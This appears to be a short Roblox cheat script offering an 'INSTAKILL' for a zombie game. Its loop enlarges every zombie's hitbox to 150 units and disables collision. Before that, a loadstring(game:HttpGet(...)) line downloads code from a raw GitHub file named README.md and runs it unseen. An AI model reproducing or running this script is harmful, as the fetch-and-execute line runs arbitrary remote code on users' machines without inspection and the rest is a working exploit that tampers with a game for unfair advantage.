Created by Oooga Booga
Features:
- ONLY WORKS ON KNIVES
- DEV NOTES:
- i recommend getting the 3k bowie knife when you can (its near the power)
- INSTAKILL
loadstring(game:HttpGet('https://raw.githubusercontent.com/yeerma/such/main/README.md'))()
while true do
pcall(function()
wait()
for i,v in next, game:GetService("Workspace").Ignore.Zombies:GetChildren() do
v.HumanoidRootPart.Size = Vector3.new(150,150,150)
v.HumanoidRootPart.CanCollide = false
end
end)
end